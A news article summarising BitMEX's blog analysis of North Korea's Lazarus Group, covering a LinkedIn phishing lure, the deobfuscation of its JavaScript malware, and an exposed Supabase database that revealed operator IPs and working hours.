BitMEX has released a detailed article on its blog outlining the many exploits of North Korea’s Lazarus Group related to recent attacks against its crypto exchange. Lazarus Group has been notorious for targeting the crypto sector, employing all sorts of tricks and tactics to steal funds from unsuspecting crypto holders.

The hackers have targeted various exchanges, including Phemex and Bybit. They even approached a BitMEX employee, offering a phony project to disguise a phishing attempt to install malicious software on the employee’s device. But now BitMEX is fighting back, taking a deep dive into the malicious code used by the hacking group. BitMEX has discovered serious vulnerabilities that exchanges can exploit to protect their assets, including exposure of the group’s tracking databases and origin IP addresses. BitMEX can track its operational hours and isolate actors pivotal to the hacking group’s operations. BitMEX has identified different tiers for hackers, with amateur hackers assigned to phishing tasks and highly skilled hackers assigned to post-exploitation procedures.

The BitMEX blog post outlined various measures to be implemented to detect security breaches in real time, including an internal monitoring system to detect infections. BitMEX has taken a sudden interest in cybersecurity because a Lazarus Group member contacted a BitMEX employee on LinkedIn, offering a proposal to join a fake NFT project. BitMEX was not impressed by the brazen phishing attempt and decided to investigate the matter. BitMEX now had a chance to analyse live Lazarus code because the hacker gave them a link to a next.js / React project on GitHub. The team quickly discovered that the code was designed to entice employees to run malicious code on their systems. 

A Lazarus Supabase was discovered by BitMEX researchers, uncovering data relating to the malware, including username, hostname, operating system, geolocation, timestamp, and IP address. BitMEX was able to classify various devices as either a developer or test machine due to the frequency of operation. Many of the developers were using VPNs to obfuscate their location. However, one developer slipped up at one stage, revealing the actual IP address of the machine, which is located in Jiaxing, China, and uses a China Mobile IP address.

BitMEX believes this was a major operational failure and could reveal the hacker’s identity. The Supabase also revealed which VPN services the hackers were using. BitMEX then developed a script to analyse the Supabase and search for operational mistakes automatically. After all, even hackers make mistakes, which can be highly costly for them. BitMEX found that Lazarus activity dropped between 8 am and 1 pm UTC, equivalent to 5 pm and 10 pm Pyongyang time. Such a structured schedule suggests the attackers are following an organised work schedule.

Advertisement  

According to BitMEX developers, hackers have various technical abilities and reside in a hierarchy of operations. The BitMEX developers could exploit such a detail by searching for mistakes made by novice hackers. BitMEX developers noticed that one hacker had attempted to reuse a program named ‘BeaverTail’ but implemented it incorrectly, nearly exposing a personal IP address. Therefore, BitMEX was able to enhance its security by first categorising attack victims so that it could detect operational mistakes made by novice hackers. 

JavaScript deobfuscation significantly impacted BitMEX developers because the Lazarus Group relied heavily on obfuscated code. The BitMEX blog commented that the developers had a lot of fun uncovering the obfuscated code because they could utilize various creative methods to find the malware. They used the tool Webcrack to rename JavaScript variables with human-readable text. Webcrack has a symbol renaming function that assists with the deobfuscation process. The BitMEX team had deobfuscated previous malware and was prepared for the task ahead. They could store various procedures so that the process could be done quickly. However, the developers noticed that the code had a new function connected to a Supabase database and added details about the victim’s machine. The Supabase allowed the attackers to create a database on the fly without needing an API layer. BitMEX developers knew programmers often do not secure such a database with authentication. They could access the Supabase and perform more analysis about the attackers.